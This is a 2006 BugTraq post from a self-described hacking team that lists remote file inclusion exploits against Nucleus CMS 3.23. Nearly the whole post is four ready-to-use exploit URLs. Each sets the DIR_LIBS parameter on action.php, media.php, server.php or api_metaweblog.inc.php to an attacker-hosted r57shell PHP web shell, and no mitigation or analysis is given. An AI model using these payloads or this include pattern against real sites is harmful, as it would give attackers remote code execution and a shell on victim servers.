BugTraq
file include exploits in nucleus 3.23 Jun 16 2006 05:01PM
gamr-14 hotmail com
Multiple file include exploits in nucleus 3.23

script type : nucleus 3.23

bug found by : sweet-devil

team : site-down

type : file include

####################################################

exploits :

action.php

http://www.example.com/path/action.php?DIR_LIBS=http://yoursite/r57shell
.txt?

media.php

http://www.example.com/path/nucleus/media.php?DIR_LIBS=http://yoursite/r
57shell.txt?

server.php

http://www.example.com/path/nucleus/xmlrpc/server.php?DIR_LIBS=http://yo
ursite/r57shell.txt?

api_metaweblog.inc.php

http://www.example.com/path/nucleus/xmlrpc/api_metaweblog.inc.php?DIR_LI
BS=http://yoursite/r57shell.txt?

####################################################

#######################

emails:

gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]

#######################

All my respect to our friends , lezr.com

done .. peace

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus